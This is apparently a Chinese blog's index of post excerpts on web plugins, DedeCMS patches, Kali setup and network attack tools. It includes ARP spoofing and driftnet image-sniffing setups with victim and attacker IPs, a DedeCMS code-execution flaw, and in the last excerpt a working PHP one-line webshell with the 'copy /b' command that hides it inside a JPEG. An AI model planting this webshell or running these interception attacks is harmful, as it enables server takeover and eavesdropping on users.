阿波罗任

摘要： 现在很多网站不仅是介绍，更多的是有一些功能，怎么样让客户快速的知道网站有哪些功能呢？这里pagewalkthrough.js插件能帮我们实现，它是一个轻量级的jQuery插件，它可以帮助我们创建一个遮罩引导层，实现页面功能引导功能，引导完成显示页面内容。 下载源码 html代码： <div id=" 阅读全文

摘要： driftnet是一款简单而使用的图片捕获工具，可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片环境 受害ip：192.168.228.130 攻击ip：192.168.228.129 网关：192.168.228.2 条件 1，开启或关闭IP转发 2，向被攻击机器发送 阅读全文

摘要： 终端执行下面命令来安装： sudo apt-get install -y dsniff ssldump 安装成功后，即可在终端运行arpspoof man手册：http://manpages.ubuntu.com/manpages/xenial/man8/arpspoof.8.html 参考：Lin 阅读全文

摘要： 问题文件：在/include/dialog/select_soft_post.php文件 解决方法： 先找到这个文件/include/dialog/select_soft_post.php，找到大概72，73行的 $fullfilename = $cfg_basedir.$activepath.'/ 阅读全文

摘要： *本文中涉及到的相关漏洞已报送厂商并得到修复，本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。 简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。 DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞，攻击者可利用该漏洞在增加新的标签中上传木 阅读全文

摘要： DEDECMS织梦的后台在登录的时候会要求输入验证码，如图所示。这也是为了防止其他人恶意攻击网站。但是有的人觉得每次登录后台输入验证码太麻烦，那也可以去掉，这个不是太大的问题，只要网站数据库以及密码保护好，一般不会有太大的安全问题。接下来我说一下方法。 删除织梦后台登录验证码的方法： 1、在www> 阅读全文

摘要： 我的需求是：我有一个128G的U盘，想把kali2安装在其中还要挖出一块当普通U盘储存其它数据， 准备工作：1、虚拟机，我用的是VMware Workstation pro 14 2、kali2 镜像文件，2018.3，可以去官网下载 3、128G的U盘，3.0的 4、磁盘分区工具DiskGeniu 阅读全文

摘要： 转自：https://www.genban.org/news/dedecms-6224.html DedeCMS注册会员上传附件时会提示“需输入后台管理目录才能登录” 解决办法： 第一步：找到程序目录include\dialog\config.php下文件。其中有段代码： //检验用户登录状态$cu 阅读全文

摘要： <script>$(function(){ var arr = new Array( "static/picture/zf.jpg", "static/picture/gf.jpg", "static/picture/qi.jpg", ); var object= document.getEleme 阅读全文

摘要： 新建一个文件夹 在其中放入一张图片文件tp.jpg，和yjh.php一句话木马 yjh.php中的一句话木马内容为<?php @eval($_POST[yjh]);?>和一个写入cmd的bat文件点击bat文件进入DOS命令，写入"copy tp.jpg/b+yjh.php tpyjh.jpg" 回 阅读全文